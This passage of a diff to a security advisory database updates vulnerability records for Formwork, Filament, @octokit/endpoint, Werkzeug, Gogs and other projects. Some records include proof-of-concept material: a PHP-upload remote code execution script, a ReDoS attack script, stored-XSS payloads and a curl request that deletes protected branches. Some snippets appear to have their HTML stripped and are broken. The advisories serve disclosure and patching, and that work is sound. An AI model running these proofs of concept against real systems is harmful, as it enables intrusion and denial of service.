_execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -49,9 +54,9 @@ "CWE-287", "CWE-434" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T16:58:33Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:21Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json index 29d2d42046096..6575c789053ec 100644 --- a/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json +++ b/advisories/github-reviewed/2024/06/GHSA-5pxr-7m4j-jjc6/GHSA-5pxr-7m4j-jjc6.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5pxr-7m4j-jjc6", - "modified": "2025-03-19T14:49:46Z", + "modified": "2026-02-18T23:46:36Z", "published": "2024-06-07T19:37:10Z", "aliases": [ "CVE-2024-37160" ], "summary": "Cross-site scripting (XSS) vulnerability in Description metadata", - "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).\n\n### PoC\n1. Log in with an Administrator user account.\n2. Navigate to /panel/options/site/.\n3. Inject the JS script by adding to the description field.\n4. Simulate a victim who is not a site member visiting the website. You will notice that the JS script executes on every page they vis\n\n![image](https://github.com/getformwork/formwork/assets/170840940/1c40be24-3367-4c80-bb44-9db64ef88970)\n![image](https://github.com/getformwork/formwork/assets/170840940/68dd5bff-9db1-441b-a3b3-a0c014565f59)\n![image](https://github.com/getformwork/formwork/assets/170840940/3cd84c39-9b44-49d0-8b6a-6c8aeda7e49f)\n![image](https://github.com/getformwork/formwork/assets/170840940/f45afd87-80e9-4cf1-8121-bb4e121849c9)", + "details": "### Summary\nRegardless of the role or privileges, no user should be able to inject malicious JavaScript (JS) scripts into the body HTML. an XSS (Cross-Site Scripting) vulnerability, specifically a Stored XSS, which affects all pages of the website. Once the JS script is embedded in the body HTML, the XSS will trigger on any page a victim visits, such as the about, blog, contact, or any other pages, except for the panel.\n\n### Impact\nThis vulnerability allows attackers to inject malicious JS or HTML through a crafted payload into the vulnerable spot, achieving persistence and attacking numerous visitors or anyone accessing the website. The attack can be widespread and affect many users because the malicious JS will execute on every page, unlike an injection on a specific page (e.g., injecting on the About page would only affect that page). In this case, a single injection point leads to the execution of the malicious JS on all pages.\n\n### Patches\n- [**Formwork 1.13.1**](https://github.com/getformwork/formwork/releases/tag/1.13.1) has been released with a patch that solves this vulnerability by escaping all metadata attributes.\n- [**Formwork 2.x** (f531201)](https://github.com/getformwork/formwork/commit/f5312015a5a5e89b95ef2bd07e496f8474d579c5) also escapes metadata attributes.\n\n### Details\nAn attackers (requires administrator privilege) to execute arbitrary web scripts by modifying site options via /panel/options/site. This type of attack is suitable for persistence, affecting visitors across all pages (except the dashboard).", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json b/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json index e74db3d61a505..2ddc41e7c50d2 100644 --- a/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json +++ b/advisories/github-reviewed/2024/06/GHSA-x4gp-pqpj-f43q/GHSA-x4gp-pqpj-f43q.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-x4gp-pqpj-f43q", - "modified": "2025-07-28T15:46:43Z", + "modified": "2026-02-17T19:30:26Z", "published": "2024-06-18T21:56:24Z", "aliases": [ "CVE-2024-58262" ], "summary": "curve25519-dalek has timing variability in `curve25519-dalek`'s `Scalar29::sub`/`Scalar52::sub`", "details": "Timing variability of any kind is problematic when working with potentially secret values such as elliptic curve scalars, and such issues can potentially leak private keys and other secrets. Such a problem was recently discovered in `curve25519-dalek`.\n\nThe `Scalar29::sub` (32-bit) and `Scalar52::sub` (64-bit) functions contained usage of a mask value inside a loop where LLVM saw an opportunity to insert a branch instruction (`jns` on x86) to conditionally bypass this code section when the mask value is set to zero as can be seen in godbolt:\n\n- 32-bit (see L106): https://godbolt.org/z/zvaWxzvqv\n- 64-bit (see L48): https://godbolt.org/z/PczYj7Pda\n\nA similar problem was recently discovered in the Kyber reference implementation:\n\nhttps://groups.google.com/a/list.nist.gov/g/pqc-forum/c/hqbtIGFKIpU/m/cnE3pbueBgAJ\n\nAs discussed on that thread, one portable solution, which is also used in this PR, is to introduce a volatile read as an optimization barrier, which prevents the compiler from optimizing it away.\n\nThe fix can be validated in godbolt here:\n\n- 32-bit: https://godbolt.org/z/jc9j7eb8E\n- 64-bit: https://godbolt.org/z/x8d46Yfah\n\nThe problem was discovered and the solution independently verified by Alexander Wagner and Lea Themint using their DATA tool:\n\nhttps://github.com/Fraunhofer-AISEC/DATA", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [ { "package": { @@ -56,7 +61,7 @@ "cwe_ids": [ "CWE-203" ], - "severity": "MODERATE", + "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2024-06-18T21:56:24Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json b/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json index 017745cd2c54d..39731d5869690 100644 --- a/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json +++ b/advisories/github-reviewed/2024/09/GHSA-9h9q-qhxg-89xr/GHSA-9h9q-qhxg-89xr.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-9h9q-qhxg-89xr", - "modified": "2024-10-23T17:40:43Z", + "modified": "2026-02-17T19:41:13Z", "published": "2024-09-27T20:51:01Z", "aliases": [ "CVE-2024-47186" ], "summary": "Filament has unvalidated ColorColumn and ColorEntry values that can be used for Cross-site Scripting", "details": "### Summary\n\nIf values passed to a `ColorColumn` or `ColumnEntry` are not valid and contain a specific set of characters, applications are vulnerable to XSS attack against a user who opens a page on which a color column or entry is rendered.\n\nVersions of Filament from v3.0.0 through v3.2.114 are affected.\n\nPlease upgrade to Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115).\n\n### PoC\n\nFor example, using a value such as:\n\n```html\nblue;\"> $state,\n])>\n```\n\nSince Laravel does not escape special characters within the `@style` Blade directive, the effective output HTML would be:\n\n```html\n
\n```\n\nCreating the opportunity for arbitrary JS to run if it was stored in the database.\n\n### Response\n\nThis vulnerability (in `ColorColumn` only) was reported by @sv-LayZ, who reported the issue and patched the issue during the evening of 25/09/2024. Thank you Mattis.\n\nThe review process concluded on 27/09/2024, which revealed the issue was also present in `ColorEntry`. This was fixed the same day and Filament [v3.2.115](https://github.com/filamentphp/filament/releases/tag/v3.2.115) followed to escape any special characters while outputting inline styles like this:\n\n```blade\n
$state,\n])>
\n```\n\nAlthough these components are no longer vulnerable to this type of XSS attack, it is good practice to validate colors, and since many Filament users may be accepting color input using the `ColorPicker` form component, [additional color validation documentation was published](https://filamentphp.com/docs/3.x/forms/fields/color-picker#color-picker-validation).", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [ { "package": { @@ -71,7 +76,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "CRITICAL", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-09-27T20:51:01Z", "nvd_published_at": "2024-09-27T21:15:03Z" diff --git a/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json b/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json index 280d5caae63c8..ae9c28bfdeebc 100644 --- a/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json +++ b/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-76p7-773f-r4q5", - "modified": "2026-01-29T12:30:25Z", + "modified": "2026-02-17T03:30:15Z", "published": "2025-02-10T18:30:47Z", "aliases": [ "CVE-2024-11831" @@ -64,6 +64,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-11831" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2769" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:1536" diff --git a/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json b/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json index b83b5f4fb7e45..113ac1a613404 100644 --- a/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json +++ b/advisories/github-reviewed/2025/02/GHSA-x4c5-c7rf-jjgv/GHSA-x4c5-c7rf-jjgv.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-x4c5-c7rf-jjgv", - "modified": "2025-02-14T22:19:51Z", + "modified": "2026-02-17T16:11:00Z", "published": "2025-02-14T17:56:18Z", "aliases": [ "CVE-2025-25285" ], "summary": "@octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking", - "details": "### Summary\nBy crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.\n\n### Details\nThe issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:\n```ts\nheaders.accept.match(/[\\w-]+(?=-preview)/g) || ([] as string[]);\n```\nThe regular expression `/[\\w-]+(?=-preview)/g` encounters a backtracking issue when it processes `a large number of characters` followed by the `-` symbol.\ne.g., the attack string: \n```js\n\"\" + \"A\".repeat(100000) + \"-\"\n```\n\n### PoC\n[The gist](https://gist.github.com/ShiyuBanzhou/a17202ac1ad403a80ca302466d5e56c4)\nHere is the reproduction process for the vulnerability:\n1. run 'npm i @octokit/endpoint'\n2. Move `poc.js` to the root directory of the same level as `README.md`\n3. run 'node poc.js'\nresult:\n4. then the program will stuck forever with high CPU usage\n```js\nimport { endpoint } from \"@octokit/endpoint\";\n// import { parse } from \"./node_modules/@octokit/endpoint/dist-src/parse.js\";\nconst options = { \n method: \"POST\",\n url: \"/graphql\", // Ensure that the URL ends with \"/graphql\"\n headers: {\n accept: \"\" + \"A\".repeat(100000) + \"-\", // Pass in the attack string\n \"content-type\": \"text/plain\",\n },\n mediaType: {\n previews: [\"test-preview\"], // Ensure that mediaType.previews exists and has values\n format: \"raw\", // Optional media format\n },\n baseUrl: \"https://api.github.com\",\n};\n\nconst startTime = performance.now();\nendpoint.parse(options);\nconst endTime = performance.now();\nconst duration = endTime - startTime;\nconsole.log(`Endpoint execution time: ${duration} ms`);\n```\n1. **Import the `endpoint` module**: First, import the `endpoint` module from the npm package `@octokit/endpoint`, which is used for handling GitHub API requests.\n\n2. **Construct the `options` object that triggers a ReDoS attack**: The following member variables are critical in constructing the `options` object:\n- `url`: Set to `\"/graphql\"`, ensuring the URL ends with `/graphql` to match the format for GitHub's GraphQL API.\n- `headers`:\n> `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n> \n- `mediaType`:\n>`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n>\n>`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\"2\"\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint package`, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(? `accept`: A long attack string is crafted with `\"A\".repeat(100000) + \"-\"`, which will be passed to the regular expression and cause a backtracking attack (ReDoS).\n> \n- `mediaType`:\n>`previews`: Set to `[\"test-preview\"]`, ensuring `mediaType.previews` exists and has values.\n>\n>`format`: Set to `\"raw\"`, indicating raw data format.\n\n3. **Call the `endpoint.parse(options)` function and record the time**: Call the `endpoint.parse(options)` function and use `performance.now()` to record the start and end times, measuring the execution duration.\n\n4. **Calculate the time difference and output it**: Compute the difference between the start and end times and output it using `console.log`. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.\n\"2\"\n\n### Impact\n#### What kind of vulnerability is it?\nThis is a **Regular Expression Denial of Service (ReDoS)** vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression `/[\\w-]+(?=-preview)/g` is vulnerable because it attempts to match long strings of characters followed by a hyphen (`-`), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.\n#### Who is impacted?\nThis vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.\nIn addition to directly affecting applications using the `@octokit/endpoint` package, the impact is more widespread because `@octokit/endpoint` is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.\nAttackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of `@octokit/endpoint`.\n\n### Solution\nTo resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to `(?\") into the Role=User parameter in the /panel/users/{name}/profile page, which is the user profile update page.\nDoing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\n\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.\n\n### PoC\n\n![2025-02-27_10-25](https://github.com/user-attachments/assets/4b5a2d71-3397-4a5b-8464-35752376115a)\n\n1. Intercept the request and inject an input that will trigger an error.\n\n![2025-02-27_10-25_1](https://github.com/user-attachments/assets/a888c109-a724-4478-ae80-d9e8b05ef1aa)\n\n![image](https://github.com/user-attachments/assets/e81bb9fc-8c92-413c-8cc0-0bcffd2e2922)\n\n2.After that, it will be observed that the system is shut down or completely broken. Even changing the browser or resetting the server will not be able to restore it.", + "details": "### Summary\nImproper validation of select fields allows attackers to craft an input that crashes the system, resulting in a 500 status and making the entire site and administration panel unavailable.\nThis clearly impacts the Availability aspect of the CIA triad (confidentiality, integrity, and availability), although the attack still has certain limitations.\n\n### Details\nThe attack involves injecting any invalid user role value. Doing this will change the users data in a way that prevents users and then the entire site from loading. Even though the actual data change is minimal, the error is unrecoverable until a valid role parameter is restored by direct modification of the user account file.\nProper validation of select fields will prevent extraneous valid from being accepted and making the entire site and administration panel unavailable.\n\n### Patches\n- [**Formwork 2.x** (d9f0c1f)](https://github.com/getformwork/formwork/commit/d9f0c1feb3b9855d5bdc8bb189c0aaab2792e7ca) adds proper validation to select fields.\n\n### Impact\nThe condition for this attack is having high privileges or Admin access, which means it could be exploited by an Insider Threat. Alternatively, if an attacker gains access to a privileged user account, they can execute the attack as well.\nOverall, the attack is relatively difficult to carry out, but if successful, the impact and damage would be significant.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json index b09f8f6bf94da..e0a593b17c8f7 100644 --- a/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json +++ b/advisories/github-reviewed/2025/03/GHSA-vf6x-59hh-332f/GHSA-vf6x-59hh-332f.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-vf6x-59hh-332f", - "modified": "2025-03-17T20:27:03Z", + "modified": "2026-02-18T23:47:22Z", "published": "2025-03-01T00:11:46Z", "aliases": [], "summary": " Formwork has a cross-site scripting (XSS) vulnerability in Site title", - "details": "### Summary\n\nThe site title field at /panel/options/site/allows embedding JS tags, which can be used to attack all members of the system. This is a widespread attack and can cause significant damage if there is a considerable number of users.\n\n### Impact\n\nThe attack is widespread, leveraging what XSS can do. This will undoubtedly impact system availability.\n\n### Patches\n- [**Formwork 2.x** (aa3e9c6)](https://github.com/getformwork/formwork/commit/aa3e9c684035d9e8495169fde7c57d97faa3f9a2) escapes site title from panel header navigation.\n\n### Details\n\nBy embedding \"\n \n\n \n\n\n\n
\n \n
\n \n \n

正在为您跳转

\n

我们正在将您引导至 Google。
如果页面没有自动刷新,请点击下方的按钮。

\n \n \n 立即前往 Google\n
\n\n \n\n\n\n```\n\n### Acknowledgments\n\nQuantumNous would like to thank **TechnologyStar** for the early notification of this potential vulnerability via AI-assisted tools, and **small-lovely-cat** for providing additional context and an initial patch. The final fix was developed and verified by the maintainers to ensure full compatibility with the project's architecture.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/QuantumNous/new-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.10.8-alpha.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-299v-8pq9-5gjq" + }, + { + "type": "WEB", + "url": "https://github.com/QuantumNous/new-api/commit/ab5456eb1049aa8a0f3e51f359907ec7fff38b4b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/QuantumNous/new-api" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:10:25Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json new file mode 100644 index 0000000000000..1d6629b5fd33b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-29vq-49wr-vm6x/GHSA-29vq-49wr-vm6x.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29vq-49wr-vm6x", + "modified": "2026-02-23T22:27:37Z", + "published": "2026-02-19T20:32:45Z", + "aliases": [ + "CVE-2026-27199" + ], + "summary": " Werkzeug safe_join() allows Windows special device names", + "details": "Werkzeug's `safe_join` function allows Windows device names as filenames if when preceded by other path segments.\n\nThis was previously reported as https://github.com/pallets/werkzeug/security/advisories/GHSA-hgf8-39gv-g3f2, but the added filtering failed to account for the fact that `safe_join` accepts paths with multiple segments, such as `example/NUL`.\n\n`send_from_directory` uses `safe_join` to safely serve files at user-specified paths under a directory. If the application is running on Windows, and the requested path ends with a special device name, the file will be opened successfully, but reading will hang indefinitely.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "werkzeug" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-29vq-49wr-vm6x" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27199" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/commit/f407712fdc60a09c2b3f4fe7db557703e5d9338d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pallets/werkzeug" + }, + { + "type": "WEB", + "url": "https://github.com/pallets/werkzeug/releases/tag/3.1.6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-67" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:32:45Z", + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json b/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json new file mode 100644 index 0000000000000..8bd8089cfb6b0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2c6v-8r3v-gh6p/GHSA-2c6v-8r3v-gh6p.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2c6v-8r3v-gh6p", + "modified": "2026-02-19T21:14:56Z", + "published": "2026-02-17T18:43:00Z", + "aliases": [ + "CVE-2026-25232" + ], + "summary": "Gogs has a Protected Branch Deletion Bypass in Web Interface", + "details": "## Summary\n\nAn access control bypass vulnerability in Gogs web interface allows any repository collaborator with Write permissions to delete protected branches (including the default branch) by sending a direct POST request, completely bypassing the branch protection mechanism. This vulnerability enables privilege escalation from Write to Admin level, allowing low-privilege users to perform dangerous operations that should be restricted to administrators only.\n\nAlthough Git Hook layer correctly prevents protected branch deletion via SSH push, the web interface deletion operation does not trigger Git Hooks, resulting in complete bypass of protection mechanisms.\n\n## Details\n\n### Affected Component\n\n- **File**: `internal/route/repo/branch.go`\n- **Function**: `DeleteBranchPost` (lines 110-155)\n- **Route Configuration**: `internal/cmd/web.go:589`\n ```go\n m.Post(\"/delete/*\", reqSignIn, reqRepoWriter, repo.DeleteBranchPost)\n ```\n\n### Root Cause\n\nThe `DeleteBranchPost` function performs the following checks when deleting a branch:\n1. ✅ User authentication (`reqSignIn`)\n2. ✅ Write permission check (`reqRepoWriter`)\n3. ✅ Branch existence verification\n4. ✅ CommitID matching (optional parameter)\n5. ❌ **Missing protected branch check**\n6. ❌ **Missing default branch check**\n\nWhile the UI layer (`internal/route/repo/issue.go:646-658`) correctly checks protected branch status and hides the delete button, attackers can directly construct POST requests to bypass UI restrictions.\n\n### Vulnerable Code\n\n**Vulnerable implementation** (`internal/route/repo/branch.go:110-155`):\n\n```110:155:internal/route/repo/branch.go\nfunc DeleteBranchPost(c *context.Context) {\n\tbranchName := c.Params(\"*\")\n\tcommitID := c.Query(\"commit\")\n\n\tdefer func() {\n\t\tredirectTo := c.Query(\"redirect_to\")\n\t\tif !tool.IsSameSiteURLPath(redirectTo) {\n\t\t\tredirectTo = c.Repo.RepoLink\n\t\t}\n\t\tc.Redirect(redirectTo)\n\t}()\n\n\tif !c.Repo.GitRepo.HasBranch(branchName) {\n\t\treturn\n\t}\n\tif len(commitID) > 0 {\n\t\tbranchCommitID, err := c.Repo.GitRepo.BranchCommitID(branchName)\n\t\tif err != nil {\n\t\t\tlog.Error(\"Failed to get commit ID of branch %q: %v\", branchName, err)\n\t\t\treturn\n\t\t}\n\n\t\tif branchCommitID != commitID {\n\t\t\tc.Flash.Error(c.Tr(\"repo.pulls.delete_branch_has_new_commits\"))\n\t\t\treturn\n\t\t}\n\t}\n\n\t// 🔴 Vulnerability: Missing protected branch check here\n\t// Should add check like:\n\t// protectBranch, err := database.GetProtectBranchOfRepoByName(c.Repo.Repository.ID, branchName)\n\t// if protectBranch != nil && protectBranch.Protected { ... }\n\n\tif err := c.Repo.GitRepo.DeleteBranch(branchName, git.DeleteBranchOptions{\n\t\tForce: true,\n\t}); err != nil {\n\t\tlog.Error(\"Failed to delete branch %q: %v\", branchName, err)\n\t\treturn\n\t}\n\n\tif err := database.PrepareWebhooks(c.Repo.Repository, database.HookEventTypeDelete, &api.DeletePayload{\n\t\tRef: branchName,\n\t\tRefType: \"branch\",\n\t\tPusherType: api.PUSHER_TYPE_USER,\n\t\tRepo: c.Repo.Repository.APIFormatLegacy(nil),\n\t\tSender: c.User.APIFormat(),\n\t}); err != nil {\n\t\tlog.Error(\"Failed to prepare webhooks for %q: %v\", database.HookEventTypeDelete, err)\n\t\treturn\n\t}\n}\n```\n\n**Correct implementation in Git Hook** (`internal/cmd/hook.go:122-125`):\n\n```go\n// check and deletion\nif newCommitID == git.EmptyID {\n fail(fmt.Sprintf(\"Branch '%s' is protected from deletion\", branchName), \"\")\n}\n```\n\n**Correct UI layer check** (`internal/route/repo/issue.go:646-658`):\n\n```go\nprotectBranch, err := database.GetProtectBranchOfRepoByName(pull.BaseRepoID, pull.HeadBranch)\nif err != nil {\n\tif !database.IsErrBranchNotExist(err) {\n\t\tc.Error(err, \"get protect branch of repository by name\")\n\t\treturn\n\t}\n} else {\n\tbranchProtected = protectBranch.Protected\n}\n\nc.Data[\"IsPullBranchDeletable\"] = pull.BaseRepoID == pull.HeadRepoID &&\n\tc.Repo.IsWriter() && c.Repo.GitRepo.HasBranch(pull.HeadBranch) &&\n\t!branchProtected // UI layer has check, but backend doesn't\n```\n## PoC\n\n### Prerequisites\n\n1. Have Write permissions to the target repository (collaborator or team member)\n2. Target repository has protected branches configured (e.g., main, master, develop)\n3. Access to Gogs web interface\n\n#### Send Malicious POST Request\n```bash\n# Directly send DELETE request bypassing UI protection\ncurl -X POST \\\n -b cookies.txt \\\n -H \"Content-Type: application/x-www-form-urlencoded\" \\\n -d \"_csrf=YOUR_CSRF_TOKEN\" \\\n \"https://gogs.example.com/username/repo/branches/delete/main\"\n```\n\"image\"\n\n## Impact\n- **Bypass branch protection mechanism**: The core function of protected branches is to prevent deletion, and this vulnerability completely undermines this 